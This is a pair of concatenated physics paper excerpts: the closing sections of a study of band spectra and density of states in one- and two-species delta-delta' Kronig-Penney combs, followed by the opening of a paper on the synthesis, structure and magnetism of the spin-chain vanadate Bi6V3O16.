\end{center}
\end{figure}
\item
From Figures \ref{Figure44} and \ref{Figure66} it is straightforward to see that for fixed $w_0$, the $n$-th allowed energy band $\varepsilon_n(q;w_0,w_1)$ obtained for different values of $w_1$ have two fixed points that can be easily obtained from \eqref{3.2} and are given by
\begin{equation}
\frac{\tan (a\sqrt{\varepsilon})}{\sqrt{\varepsilon}}= -\frac4{w_0},
\end{equation}
{which correspond to each of the points of the discrete spectrum} obtained in \eqref{3.9} for the critical values $w_1=\pm 1$.
\end{enumerate}
\subsubsection{Effect of the $\delta'$ on the density of states}
The effect of the presence of a $\delta'$ on the density of states will be analysed next. Taking into account the results of Section~\ref{dos21}, and in particular \eqref{2.29}, we show in
Figures~\ref{8} and~\ref{9} the properties of the density of states as a function of the energy $\varepsilon$ for the $\delta$-$\delta'$ comb in different situations. In addition, we compare the numerical results with the density of states of a Dirac $\delta$ comb with the same coupling.
\begin{figure}[h]
\begin{center}
\includegraphics[width=0.4\linewidth]{density_m5_p5.jpeg}\qquad \includegraphics[width=0.4\linewidth]{density_m5_5.jpeg}
\caption{(color online) Density of states in the lower bands of the $\delta$-$\delta^\prime$ comb. {On the left when $w_0=-5$ and $w_1=0.5$ (blue curves), compared with the density of states in the Dirac comb (green curves). On the right analogous graphics when $w_1=5$.}}
\label{8}
\end{center}
\end{figure}
\begin{figure}[H]
\begin{center}
\includegraphics[width=0.4\linewidth]{density_5_p5.jpeg}\qquad\includegraphics[width=0.4\linewidth]{density_5_5.jpeg}
\caption{(color online) Density of states in the lower bands of the $\delta$-$\delta^\prime$ comb. {On the left when $w_0=5$ and $w_1=0.5$ (blue curves), compared with the density of states in the Dirac comb (green curves). On the right analogous graphics when $w_1=5$.}}
\label{9}
\end{center}
\end{figure}
In Figure~\ref{8} we show the typical behaviour of the density of states for strongly attractive delta wells with subcritical and supercritical $\delta'$ couplings.
On the other hand, in Figure~\ref{9} we plot the density of states for strongly repulsive delta barriers with subcritical and supercritical $\delta'$ couplings.
From the Figures, we infer the following general effects when we introduce a $\delta^\prime$ interaction in a Dirac comb:
\begin{itemize}
\item
Whenever $w_1$ is subcritical ($|w_1|<1$), the band widths are narrower compared to the Dirac comb, and in addition the minima of the density of states is greater respect to the Dirac comb (see the left plots on Figures~\ref{8} and~\ref{9}).
\item
If $w_1$ is subcritical ($|w_1|<1$), the forbidden gap of the $\delta$-$\delta^\prime$ comb increases with respect to the Dirac comb (see the left plots on Figures~\ref{8} and~\ref{9}, and Figures \ref{Figure1}-\ref{Figure2} left as well).
If $w_1$ is supercritical ($|w_1|>1$), the forbidden gap of the $\delta$-$\delta^\prime$ comb decreases with respect to the maximum gap reached at the critical value $w_1=\pm1$ and tends to zero as $w_1\to\infty$ (see the right plots on Figures~\ref{8} and~\ref{9}, and Figures \ref{Figure1}-\ref{Figure2} left as well).
\item
For those cases in which the Dirac comb has a negative energy band ($w_0<0$), introducing the $\delta^\prime$ interaction shifts towards higher energies the lowest energy band (see Figure~\ref{8}). In addition, when $|w_1|>1$ the positive energy bands are as well shifted towards higher energies.
\item
When the lowest energy band of the Dirac comb is positive ($w_0>0$), introducing the $\delta^\prime$ interaction shifts towards lower energies the lowest energy band (see Figure~\ref{9}). This displacement of the energy happens as well for all the energy bands when $|w_1|>1$.
\end{itemize}
The qualitative effects just mentioned and shown in Figures~\ref{8} and~\ref{9} {are} maintained throughout the space of couplings $(w_0,w_1)$, a fact that can be inferred from Figures~\ref{Figure1}-\ref{Figure2} and other analytical studies of the densities of states and the forbidden energy bands \cite{KURASOVLARSON}.
\section{The two-species hybrid Dirac comb}\label{sec_2species}
The two-species hybrid Dirac comb is obtained by superposition of two one-species hybrid Dirac combs, like the potential in \eqref{1.8}, with different couplings and displaced by $\pm d/2$ with respect to the original one.
Therefore, in the two-species hybrid Dirac comb the potential $V_C(x)$ in \eqref{2.4} from which the periodic potential is built is given by
\begin{equation}\label{4.1}
V_C(x)=w_0\,\delta(x+\tfrac{d}2)+2w_1\,\delta^\prime (x+\tfrac{d}2)+v_0\,\delta(x-\tfrac{d}2)+2v_1\,\delta^\prime (x-\tfrac{d}2),
\end{equation}
which has been studied in detail in \cite{MM}. As it was already explained in Section~\ref{sec_review}, all we need to know to study the band spectrum and the density of states of the periodic potential built from \eqref{4.1} is its corresponding scattering data, which were computed in \cite{MM}:
\begin{eqnarray}
\label{4.3}
\!\! \!\! \!\! \!\!
t(k)\!\!&\!=\!&\!\! \frac{1}{\Delta}\left(4 k^2 \left(v_1^2-1\right) \left(w_1^2-1\right)\right),
\\ [1ex]
\label{4.4}
\!\! \!\! \!\! \!\!
r_R(k) \!\!&\!=\!&\!\! \frac{-1}{\Delta}\left( e^{-i d k} \left(2 k \left(v_1^2+1\right)+i v_0\right) \left(4 k w_1+i w_0\right)+e^{i d k} \left(2 k
\left(w_1^2+1\right)-i w_0\right) \left(4 k v_1+i v_0\right) \right),
\\ [1ex]
\label{4.5}
\!\! \!\! \!\! \!\!
r_L(k) \!\!&\!=\!&\!\! \frac{1}{\Delta}\left( e^{i d k} \left(2 k \left(v_1^2+1\right)-i v_0\right) \left(4 k w_1-i w_0\right)+e^{-i d k} \left(2 k
\left(w_1^2+1\right)+i w_0\right) \left(4 k v_1-i v_0\right) \right),
\\ [1ex]
\!\! \!\! \!\! \!\!
\Delta(k) \!\!&\!=\!&\!\! e^{2 i d k} \left(4 k v_1+i v_0\right) \left(4 k w_1-i w_0\right)+\left(2 k \left(v_1^2+1\right)+i v_0\right) \left(2 k \left({w_1}^2+1\right)+i w_0\right).
\end{eqnarray}
Our goal is to obtain the secular equation for this case. To this end, we operate as in Section~\ref{sec_review} for the single-species hybrid potential using the scattering data. Inserting these scattering amplitudes into \eqref{2.11} after some algebraic manipulations, and using the definitions introduced in \eqref{3.3} we obtain the following expression for the secular equation:
\begin{eqnarray}\label{4.8}
\cos(q a)= f(w_1)f(v_1)\left[\frac{w_0 h(w_1)+v_0 h(v_1)}{2k} \sin (a k)+ \frac{v_0 w_1-v_1 w_0}{k} h(v_1) h(w_1) \sin (k (a-2 d))\right. \nonumber\\[2ex]
+\left. \left(1-\frac{v_0w_0}{4k^2} h(v_1) h(w_1)\right)\cos (a k)+ h(v_1) h(w_1)\left(4w_1v_1+\frac{w_0v_0}{4k^2}\right) \cos (k (a-2 d))\right].
\end{eqnarray}
Observe that there is only one term in \eqref{4.8} that breaks the exchange symmetry given by $(v_0,v_1)\leftrightarrow(w_0,w_1)$ and this is the coefficient of $\sin (k (a-2 d))$. Therefore, all those configurations of the two species comb
for which $v_0 w_1=v_1 w_0$
holds, are symmetric under the above exchange symmetry. In general, the band spectrum is symmetric under the following transformation
\begin{equation}\label{4.10}
(w_0,w_1,v_0,v_1,d)\leftrightarrow(v_0,v_1,w_0,w_1,a-d),\quad {0< d< a}\,.
\end{equation}
This symmetry transformation is easily understood by recalling formula \eqref{4.8}. Indeed, the difference between looking at the $\delta\text{-}\delta'$ pairs at distance $d$ or to distance $a-d$ is the inversion of the roles of the coefficients $\{w_0,w_1\}$ and $\{v_0,v_1\}$. This symmetry is shown by the secular equation \eqref{4.8}.
\subsection{The band spectrum for the two-species hybrid comb}\label{subsect41}
In this subsection we will carry out a qualitative study of the properties of the band spectrum for the two-species hybrid comb. In this situation, the space of parameters has dimension {5: $\{w_0,w_1,v_0,v_1,d\}$. Looking} at equation \eqref{4.8} the first thing we can infer is that there will be eight different possibilities of having a discrete spectrum, which correspond to regimes in the couplings in which the transmission amplitude \eqref{4.3} becomes {zero: the limits $w_1\to\pm1$, $v_1\to\pm1$, $w_1=v_1\to\pm1$ and $w_1=-v_1\to\pm1$.}
\begin{figure}[htbp]
\centerline{ \includegraphics[height=0.22\textheight]{w1v1-plane.jpg}}
\caption{(color online) Regions in the $w_1$-$v_1$ plane that maintain the sign of the band curvature. The green areas are the ones in which each band of the hybrid comb has the same sign as the analogue band of the two-species $\delta$ comb. The orange areas are the ones in which each band of the hybrid comb has the opposite sign as the analogue band of the two-species $\delta$ comb.
}
\label{f9}
\end{figure}
As it happens for the one-species hybrid comb, whenever any of the $\delta'$-couplings {reaches} one of these critical regions of the whole coupling space, the bands of the comb become totally flat (zero curvature) giving rise to a pure point spectrum. Hence the critical regions mentioned in the items above are the regions where the sign of the curvature of the bands changes, with respect to the curvature of the bands of the pure two-$\delta$-species comb with couplings $w_0$ nd $v_0$. In Figure \ref{f9} we show the change of the band curvature for a hybrid comb with couplings $\{w_0,v_0,w_1,v_1\}$ with respect to the two-species $\delta$-comb with couplings $\{w_0,v_0\}$ in the $w_1$-$v_1$ plane.
The set of critical regimes described above can be divided into two sets:
\begin{enumerate}
\item{The four critical hyperplanes $w_1=\pm1$ and $v_1=\pm1$ affect only to one of the species. Thus, the real line is divided into independent boxes with opaque wall and length $a$. Each box confines a quantum particle on the interval $[na\pm d/2,(n+1)a\pm d/2]$, which consequently has a discrete set of energy values. These energy values are those obtained for an infinite one-dimensional square well with an additional interaction of the type $\delta\text{-}\delta'$ located at {$x=\pm d/2$. }The wave function satisfies Dirichlet boundary conditions at one side and Robin at the other. This fact was shown in \cite{MM}.}
\item{The other four critical points correspond to the values $ w_1=v_1=\pm 1, w_1=-v_1=\pm 1$. In this case, all $\delta\text{-}\delta'$ interactions are opaque. Therefore, we have ``doubled'' the number of isolated boxes. Each of the isolated intervals of length $[na\pm d/2,(n+1)a\pm d/2]$, which determine a box, is now split into two disjoint intervals:
$$
[na\pm d/2,(n+1)a\pm d/2] \to [na-d/2,na+d/2)\cup(na+d/2,(n+1)a-d/2].
$$
At each wall, wave functions satisfy either Dirichlet, Neumann or Robin conditions as shown in \cite{MM}. }
\end{enumerate}
{The energy band spectrum is determined by the equation \eqref{4.8}.} In Figures \ref{f10}-\ref{f12} we show the first two energy bands for different two-species hybrid combs, compared to its analogue of two-species $\delta$-comb. From the figures we can infer the following general properties:
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w10_m5m6.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w102_m5m6.jpeg}}
\caption{(color online) First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-5$, $v_0=-6$, $d=1/3$, and $a=1$. Left: $w_1=0$. Right $w_1=0.2$.
}
\label{f10}
\end{figure}
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w102_m5p5.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w14_m5p5.jpeg}}
\caption{(color online)First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-5$, $v_0=5$, $d=1/3$, and $a=1$. Left: $w_1=0.2$. Right $w_1=4$.
}
\label{f11}
\end{figure}
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w102_m15m10.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w14_m15m10.jpeg}}
\caption{(color online) First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-15$, $v_0=-10$, $d=1/3$, and $a=1$. Left: $w_1=0.2$. Right $w_1=4$.}
\label{f12}
\end{figure}
\begin{itemize}
\item
As can be seen from all the plots in Figures \ref{f10}-\ref{f12} a consequence of the existence of eight different possible discrete spectra is that there are none fixed crossing points for all the energy bands, unlike it happened in the one-species case for positive energy bands.
\item
When both species of the hybrid comb include very attractive Dirac-$\delta$ wells (Figure \ref{f10}) and there is only one negative energy band, it mostly remains in the negative energy part of the spectrum. Only in those cases in which at least one of the $\delta'$-couplings are supercritical, {$|w_1|\gg 1$ and/or $|v_1|\gg 1$, }the lowest energy band crosses to the positive energy spectrum (see Figure \ref{f10} right).
\item
The energy shift produced by the appearance of $\delta'$ terms with respect to the two-species $\delta$-comb is much bigger for the negative energy bands and supercritical regimes. In fact as can be seen from all the plots in Figures \ref{f10}-\ref{f12} {right} this energy increase of the negative energy bands is such that they end up contained in a forbidden energy gap of the corresponding two-species $\delta$-comb as $w_1$ increases.
\item
It is remarkable, that when the comb alternates a $\delta$-well and a $\delta$-barrier (i. e. $w_0$ and $v_0$ have opposite signs, as in Figure \ref{f11}), the lowest negative energy (localised states) band of the two-species $\delta$-comb becomes a positive energy band (propagating states) when one of the $\delta'$-couplings is in the supercritical regime, e. g. $|w_1|>>1$ (see Figure \ref{f11} {left}).
\item
The phenomenon described above happens as well for the excited negative energy band in those cases where there are two negative energy bands, as it is shown in the right plot of Figure \ref{f12}.
\item
Lastly it is quite interesting to remark, the physical properties of those hybrid combs with two negative energy bands (Figure \ref{f12}). The existence of regions in the space of parameters of the systems where one can find two negative energy bands is expected, since the double $\delta$-$\delta'$ potential admits two bound states, as it was shown in \cite{MM}. {These type of hybrid combs require very high temperatures to promote charge carriers from the lowest energy band to the first positive energy band, as can be seen from the right plot in Figure \ref{f12}. In fact an increase of temperature would promote the population of the excited negative energy band, provided that the crystal is not destroyed by such high temperature. Only in those cases in which the excited negative energy band becomes a positive energy band partially or totally, this first excitation would give rise to propagating states in the comb.}
\end{itemize}
\subsection{From two-species to one-species hybrid comb}
In this subsection we annalyse the limit in which the displacement of the combs $d$ tends to $0$ or $a$. This limit is of particular interest, because as it was shown in \cite{gadella-jpa16}, the superposition of two $\delta$-$\delta'$ potentials on the same point obeys a non abelian law.
To start with let us remember the basic result from \cite{gadella-jpa16}. {Given the potential \eqref{4.1} the limit $d\to 0$ gives rise to a single $\delta$-$\delta'$ potential
\begin{equation}\label{4.19}
\lim_{d\to0}V_{\delta\delta'}(x)=u_0\,\delta(x)+2u_1\,\delta^\prime (x),
\end{equation}}
where the couplings $u_0$ and $u_1$ are given in terms of the couplings $\{w_0,w_1,v_0,v_1\}$ by:
\begin{equation}\label{4.20}
u_0=\frac{v_0(1-w_1)^2+w_0(1+v_1)^2}{(1+v_1w_1)^2}
\,,\quad
u_1= \frac{v_1+w_1}{1+v_1w_1}
\end{equation}
This result can be demonstrated by showing that the limit $d\to 0$ in the scattering data \eqref{4.3}-\eqref{4.5} results in the scattering data for a single $\delta$-$\delta'$ potential \eqref{3.1}-\eqref{3.1.5} with couplings $u_0$ and $u_1$ given by \eqref{4.20}.
\paragraph{The limit $d\to0$.} When we take the limit in which the displacement of the two-species hybrid comb
tends to zero, taking into account the result given by \eqref{4.19} it is straightforward to see that we obtain a one-species hybrid comb with couplings $u_0$ and $u_1$ given by \eqref{4.20}. This case is a direct application of the result obtained in \cite{gadella-jpa16}.
\paragraph{The limit $d\to a$.} {In this case, before using the central result from \cite{gadella-jpa16} we need to rearrange the comb appropriately. Notice that when $d$ gets close to $a$, then we can rewrite our original two-species hybrid comb with the double $\delta$-$\delta'$ potential \eqref{4.1} exchanging $w_0,w_1\leftrightarrow v_0,v_1$ centered at each linear chain point. Accounting for the traslation invariance the result of taking $d\to a$ is a one species comb
\begin{eqnarray}\label{4.22}
\sum_{n=-\infty}^{\infty}\tilde u_0\,\delta(x-na)+2\tilde u_1\,\delta^\prime (x-na)\,.
\end{eqnarray}}
where the resulting effective couplings are given by
\begin{equation}\label{4.23}
\tilde u_0=\frac{w_0(1-v_1)^2+v_0(1+w_1)^2}{(1+w_1v_1)^2}\,,\quad
\tilde u_1=u_1= \frac{w_1+v_1}{1+w_1v_1}
\,.
\end{equation}
It is quite remarkable, that both limits give rise to a one-species hybrid comb. In both cases, the resulting $\delta'$-coupling is the same. Nevertheless, in each of the limits we obtain a different $\delta$-coupling
\section{Conclusions and further comments}\label{sec_conclusions}
{In this paper we have performed a detailed study of a generalised one-dimensional Kronig-Penney model using $\delta\text{-}\delta'$ potentials}. In Section \ref{sec_review} we have reviewed and generalised the formulas of the band spectrum and density of states for periodic potentials built from superposition of potentials with compact support centered in the linear lattice sites. As an application of the latter we have performed a very detailed study of the band spectrum for a hybrid comb formed by an infinite chain of identical and equally spaced $\delta$-$\delta'$ potentials .
It has been shown in previous works that the $\delta$-$\delta'$ potential
becomes opaque (identically zero transmission amplitude) when the coupling of the $\delta'$ satisfies $w_1=\pm 1$. Moreover, it was demonstrated that when $w_1=\pm 1$ the two sides of the opaque $\delta$-$\delta'$ wall are equivalent to imposing Dirichlet (left-side)/Robin (right-side) or Neuman (left-side)/Robin (left-side) boundary conditions. In both cases the Robin boundary condition parameter is determined by the Dirac-$\delta$ coupling $w_0$. As a consequence of this the most remarkable result concerning our study of the one-species hybrid comb is that the band spectrum degenerates to a standard discrete spectrum when we set $w_1=\pm1$. Moreover the addition of the $\delta'$ potentials with subcritical coupling ($\vert w_1\vert<1$) shows a narrower density of states distributions meaning that the density of states in the continuous spectrum is more concentrated
around the middle band point compared to the pure Dirac-$\delta$ comb. If the coupling of the $\delta'$ is supercritical ($\vert w_1\vert>1$) the width of the forbidden energy gaps decreases with $\vert w_1\vert$, reaching the free particle continuum spectrum for $\vert w_1\vert\to\infty$. To summarise, the effect of $\delta'$ interactions perturbing a Dirac-$\delta$ comb is more significant when we look at the curvature of the bands: while we remain in the subcritical regime $\vert w_1\vert<1$ the curvature of the bands stays the same as in the Dirac-$\delta$ comb, but crossing to the supercritical regime $\vert w_1\vert>1$ changes the curvature of the bands (see Figures \ref{Figure44} and \ref{Figure66}).
The conductor/insulator behaviour of the one-species hybrid comb requires a conceptual step forward to study the properties of the system with infinitely many charge carriers (see \cite{BMS1}). In addition when there are many charge carriers the spin-statistics properties must be accounted for. Our result on the calculation of the density of states enables to compute in future works the thermodynamical properties of these systems whenever the charge carriers are spin-$1/2$ particles, or integer spin particles (typically Copper pairs).
Lastly we have repeated the previous analysis for the two-species comb. This comb is built as an infinite chain of double $\delta$-$\delta'$ potentials. In addition to the appearance of eight opaque regimes in the space of couplings,
the allowed bands are deformed in interesting ways, even changing the curvature, with respect to the bands in the hybrid Dirac comb with only one-species of potentials. In this case the most remarkable effect over the curvature of the bands with respect {to} the one-species case, is that when both $\delta'$-couplings are in the supercritical regime, i. e. $\vert w_1\vert,\vert v_1\vert>1$, the curvature of the bands remains the same as for the pure Dirac-$\delta$ two-species comb ($w_1=v_1=0$), as can be seen from the figures presented in Subsection~\ref{subsect41}.
\subsection{Further comments}
The connection between these type of dynamical systems and quantum wires was pointed and developed out by Cerver\'o and collaborators in Refs. \cite{KOR,KOR2}, where Dirac-$\delta$ chains are used a simple model for a quantum wire. Furthermore, when the Dirac-$\delta$ potentials are randomly distributed along the real line the authors found Anderson localization, and were able to reproduce many of the physical properties expected in a quantum wire \cite{KOR2,KOR3,KOR4}. The authors were able to obtain further results on this system, such as a realistic absorption pattern in quantum wires when the coupling of the $\delta$-potentials is a complex number with positive imaginary part \cite{KOR3}, taking into account the previous results on ${\cal PT}$-symmetric periodic non-hermitian Hamiltonians \cite{KOR5,KOR6}.
The basis of many of the works mentioned above is the fact that the Kronig-Penney comb is a very well studied periodic one-dimensional system. The results presented in this work generalise the Kronig-Penney comb, in order to provide a much richer model for quantum wires, where each point-supported potential in the chain contains two free parameters. The main physical consequence of introducing one extra coupling is that gives rise to a more tuneable band structure. In addition, the study carried out in this paper, where we have accounted for negative Dirac-$\delta$ couplings that give rise to negative energy bands, will enable to mimic absorption in the quantum wire when the system is studied in the quantum field theoretical framework at zero and finite temperature \cite{BMS1,BMS2}. In a quantum field theoretical framework, there is no need to assume complex couplings for the Dirac-$\delta$ to get the required unitarity loss. Furthermore, our results enable to extend the analysis performed for random distributions of Dirac-$\delta$ chains in the papers mentioned above, but for more general potentials with point support.
\section*{Acknowledgements}
This work was partially supported by the Spanish Junta de Castilla y Le\'on and FEDER projects (BU229P18 and VA137G18). L.S.S. is grateful
to the Spanish Government for the FPU-fellowships
programme (FPU18/00957).
The authors acknowledge the fruitful discussions with M. Bordag, K. Kirsten, G. Fucci, and C. Romaniega.
| 2024-02-18T23:40:04.191Z | 2020-09-28T02:11:11.000Z | algebraic_stack_train_0000 | 1,241 | 12,277 |
|
proofpile-arXiv_065-6116 | \section{introduction}
Magnetism in one-dimensional (1D) Heisenberg antiferromagnetic
(AFM) spin systems has remained an area of wide interest in condensed-matter physics since 1970s.~\cite{Lieb1961,Affleck1989}
This is mainly due to the rich physics such spin chains exhibit. Furthermore,
these systems are tractable from both theoretical~\cite{Eggert1994,KuJohnston2000}
and computational~\cite{BF1964,Bonner1979,Alternating chain expression paper_Johnston}
starting points. The prime interest here is the innate strong quantum
fluctuations which lead to the suppression
of magnetic long range ordering.~\cite{Mermin Wagner prevention of LRO in 1D}
The nature of the ground state in these systems depends on the value
of spin $S$ and relative strength and sign (AFM or ferromagnetic)
of their coupling $J$. The generic magnetic Hamiltonian describing
an $S=\frac{1}{2}$ Heisenberg chain can be written as $H~=~J\sum_{i}S_{i}S_{i+1}$,
where $J$ is the intrachain coupling constant between the nearest-neighbor
spins. A uniform half-integer spin chain with AFM interactions
exhibits a gapless ground state.~\cite{Endoh1974,Nagler1991,Tennant1993,Lake2005,SrCu2O3,Ronnow2013,Ba2Cu(PO4)2-NMR-T1,NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3,Tran2019}
In the case of an AFM alternating Heisenberg chain, the AFM exchange
constants ($J_{1}$ and $J_{2}$) between the two nearest-neighbor
spins are unequal ($J_{1}$$\neq$ $J_{2}$; $J_{1}$, $J_{2}$$>0$),
and they alternate from bond to bond along the chain with an alteration
parameter $\alpha=J_{2}/J_{1}$.
In the case of an alternating chain, interactions for half-integer spins result in the
opening of a gap via either frustration due to the next-nearest-neighbor AFM
exchange or dimerization due to the alternating coupling to nearest neighbors
along the chain.~\cite{spin gap in alternating spin chain,Bonner1983,
Xu2000,VOPO_Johnston,VOPO_Barnes,VOPO_Garrett,(VO)2P2O7-NR_T1_spin gap,CaCuGe2O6,AgVOAsO4 NMR,Lebernegg2017}
Many $S=\frac{1}{2}$ chain systems have already been reported, and their
characteristics have been interpreted on the basis of such a model.
Some of the most renowned examples in this category are CuCl$_{2}\cdot$2N(C$_{5}$D$_{5}$),~\cite{Endoh1974}
KCuF$_{3}$,~\cite{Nagler1991,Tennant1993,Lake2005} Sr$_{2}$CuO$_{3}$,\cite{SrCu2O3} CuSO$_{4}\cdot$5H$_{2}$O,~\cite{Ronnow2013}, Ba$_{2}$Cu(PO$_{4}$)$_{2}$,~\cite{Ba2Cu(PO4)2-NMR-T1} and, recently, (NO)[Cu(NO$_3$)$_3$]~\cite{NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3} and Cs$_4$CuSb$_2$Cl$_{12}$~\cite{Tran2019} for uniform and
Cu(NO$_{3}$)$_{2}\cdot$2.5H$_{2}$O,~\cite{Bonner1983,Xu2000}
(VO)$_{2}$P$_{2}$O$_{7}$,\cite{VOPO_Johnston,VOPO_Barnes,VOPO_Garrett,(VO)2P2O7-NR_T1_spin gap}
CaCuGe$_{2}$O$_{6}$,\cite{CaCuGe2O6}
AgVOAsO$_{4}$\cite{AgVOAsO4 NMR}, and Cu$_3$(MoO$_4$)(OH)$_4$\cite{Lebernegg2017}
for alternating $S=\frac{1}{2}$ Heisenberg spin chains
\begin{figure}
\begin{centering}
\includegraphics[scale=0.056]{Fig1_alfaBVA6Long_scan_pic1_vesta}
\par\end{centering}
\caption{\label{fig:1 uniform chain structure}Left: Possible interaction path
between the magnetic V$^{4+}$ ions in Bi$_{6}$V$_{3}$O$_{16}$
mediated via nonmagnetic V$^{5+}$ ions and oxygen. Right: Top view of
the chains separated by Bi-O layers. }
\end{figure}
Our motivation is to explore new low-dimensional magnetic oxides with
the intention of unraveling novel magnetic properties. In this paper
we report the bulk and local (NMR) studies of the vanadium-based $S=\frac{1}{2}$
uniform spin chain compound Bi$_{6}$V$_{3}$O$_{16}$ (often described also as
Bi$_{4}$V$_{2}$O$_{10.66}$) at low temperatures.
This system is a member of the well-known pseudo binary oxide systems
Bi$_{2}$O$_{3}$-V$_{2}$O$_{5}$, which received significant interest
because of their different structural varieties and rich functional
properties,~\cite{Reference for Bi2O3-V2O5,First report on Bi4V2O10}
which led also to a very efficient bismuth-metal-vanadia (BiMeVOX) family of anionic conductors.~\cite{BiMeVOX,SOEC-review}
These systems belong to or are derived from the Aurivillius family.~\cite{Aurivillius_1,Aurivillius_2}
They exhibit three polymorphs, $\alpha$, $\beta$, and $\gamma$, each
associated with a different temperature range, where the $\alpha$ phase
is the low-temperature one. One of these Aurivillius vanadates,
Bi$_{4}$V$_{2}$O$_{10}$ which contains all the vanadium ions in
the V$^{4+}$ oxidation state, was studied thoroughly via crystal
structure, electron diffraction, and thermodynamic properties about
two decades ago.\cite{Bi4V2O10_structure,Bi4V2O10_chain structure}
In the $\alpha$ phase of Bi$_{4}$V$_{2}$O$_{10}$, the magnetic
V$^{4+}$ ions are arranged in a 1D chain along the $a$ direction
of the unit cell (see Fig.~\ref{fig:1 uniform chain structure};
\href{http://jp-minerals.org/vesta/en/}{\textsc{vesta}}
software~\cite{vesta} was used for crystal structure visualization).
It was also proposed by Satto \textit{et al.}\cite{Bi4V2O10_chain structure}
that $\alpha-$Bi$_{4}$V$_{2}$O$_{10}$ transforms to $\alpha-$Bi$_{6}$V$_{3}$O$_{16}$
after oxidation upon exposure to air at room temperature. The orientation
of the magnetic V$^{4+}$ ions in 1D chains remains intact in the
crystal structure of the $\alpha$ phase of Bi$_{6}$V$_{3}$O$_{16}$,
which is best described by V$_{3}$O$_{16}^{6-}$ ribbons running along
the $a$ axis and containing units built up from a pyramid (V$^{4+}$)
and two tetrahedra (V$^{5+}$).~\cite{Bi4V2O10.66_crystal structure,Bi4V2O11 to Bi4V2O10.66}
This is one of the few systems found so far in nature where the extended superexchange
interaction takes place by the overlap of $d_{xy}$ (via the oxygen $p$ ) orbitals of $d_1$
electrons ($t_{2g}$) of V$^{4+}$ ions rather than the $d_{x2-y2}$ orbitals of $e_g$ electrons
in Cu-based systems, with an exchange coupling ($J/k_B$) as high as $\sim$~100~K.
Very recently, magnetic properties and charge ordering were reported
for another related compound, Bi$_{3.6}$V$_{2}$O$_{10}$,\cite{Ref.19_magnetic measurement-BiV2O5_2013,BiV2O5_Oct 2015_paper}
which also belongs to the aforementioned Aurivillius family. However,
a detailed investigation of the bulk and local properties with a proper
theoretical model has not been carried out for any of these magnetic
Aurivillius vanadates. This leads to the the primary sources of motivation
for our present work.
\section{Sample preparation, crystal structure, and experimental details}
Bi$_{6}$V$_{3}$O$_{16}$ is an orthorhombic system and crystallizes in
the $Pnma$ space group.~\cite{Bi4V2O10.66_crystal structure} The
low-temperature phase of Bi$_{6}$V$_{3}$O$_{16}$ was synthesized
by mixing stoichiometric amounts of Bi$_{2}$O$_{3}$ (Alfa Aesar, $99.99\%$)
and VO$_{2}$. VO$_{2}$ was prepared through the reaction of an equimolar mixture
of V$_{2}$O$_{5}$ and V$_{2}$O$_{3}$ at $680\lyxmathsym{\textdegree}$
C for $18$ h under vacuum. V$_{2}$O$_{3}$ was obtained by reducing
V$_{2}$O$_{5}$ ($99.99\%$, Aldrich) under hydrogen flow at $800$$\lyxmathsym{\textdegree}$
C. The mixture of Bi$_{2}$O$_{3}$ and VO$_{2}$ was then pelletized
and placed in a quartz ampule sealed in vacuum ($<10^{-5}$mbar).
The ampule was annealed at $550$\textdegree{} C for $48$ h. This process was repeated
three times with intermediate grinding and mixing. The last round
of heating was performed at $620$\textdegree{} C for $36$ h.
After a few weeks of exposure in open air, Bi$_{4}$V$_{2}$O$_{10}$ self-oxidized
into Bi$_{6}$V$_{3}$O$_{16}$, and its color changed from black to dark brown.
A similar transformation was observed previously by Satto \textit{et al.}\cite{Bi4V2O10_chain structure}
Energy dispersive x-ray (EDX) microanalysis show an elemental ratio
of bismuth and vanadium of Bi:V$\simeq2:1$ (see
Fig.~\ref{fig2:EDX&SEM_ Fig2}).
\begin{figure}
\begin{centering}
\includegraphics[scale=0.5]{Fig2_EDX}
\par\end{centering}
\caption{\label{fig2:EDX&SEM_ Fig2}EDX spectrum (top) and SEM image (bottom)
of polycrystalline Bi$_{6}$V$_{3}$O$_{16}$.}
\end{figure}
X-ray diffraction (XRD) patterns were collected using
a PANalytical X'Pert$^3$ Powder x-ray diffractometer (Cu $K \alpha$
radiation, $\lambda=1.54182$~\AA).
The
Rietveld refinement against the XRD data was carried out using the \textsc{jana}2006
software\cite{JANA2006}(see Fig.~\ref{fig3:xrda+Alfa_refinement}).
The XRD pattern shows a single phase of Bi$_{6}$V$_{3}$O$_{16}$ (space
group: $Pnma~(62)$,\
$a=5.47124(3)$~\AA,\
$b=17.25633(8)$~\AA, \
$c=14.92409(6)$~~\AA).
The ratio of $c/(b/3)\simeq2.6$ obtained from the refinement is consistent
with the previous study carried out on single crystals of the $\alpha$ phase
of Bi$_{6}$V$_{3}$O$_{16}$.~\cite{Bi4V2O11 to Bi4V2O10.66}
The refined atomic coordinates of Bi$_{6}$V$_{3}$O$_{16}$ are given
in Table \ref{atomic positions_alfa}.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.11]{Fig3_XRD_Valera}
\par\end{centering}
\caption{\label{fig3:xrda+Alfa_refinement
Experimental (black points) and calculated (red line) powder XRD patterns of Bi$_{6}$V$_{3}$O$_{16}$.
Positions of peaks are given by black ticks, and the difference plot is shown
by the black line in the bottom part. }
\end{figure}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|c|c|}
\hline
Atoms & \multicolumn{1}{c}{} & \multicolumn{1}{c}{Coordinates} & \multicolumn{1}{c|}{} & TDP \tabularnewline
\hline
& $x/a$ & $y/b$ & $z/c$ & $B_{iso}$ ($\textrm{\ensuremath{\mathring{A}}}^{2}$)\tabularnewline
\hline
